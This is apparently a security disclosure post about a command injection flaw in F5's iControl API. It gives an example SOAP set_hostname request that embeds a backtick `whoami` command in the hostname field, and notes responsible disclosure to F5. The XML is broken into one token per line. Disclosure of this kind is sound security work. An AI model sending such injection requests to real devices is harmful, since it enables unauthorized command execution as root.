Hi,
Linked below is an advisory regarding remote command execution (as root,
possibly) vulnerabilities within the iControl API:
An example request that will set the hostname to 'root.example.com':
<?
xml
version
=
"1.0"
encoding
=
"ISO-8859-1"
?>
<
SOAP-ENV:Envelope
<
SOAP-ENV:Body
>
<
n1:set_hostname
xmlns:n1
=
"urn:iControl:System/Inet"
>
<
hostname
>`whoami`.example.com</
hostname
>
</
n1:set_hostname
>
</
SOAP-ENV:Body
>
</
SOAP-ENV:Envelope
>
This was responsibly disclosed to F5 on the 7th of February. If you
would like the full communication timeline, feel free to ask.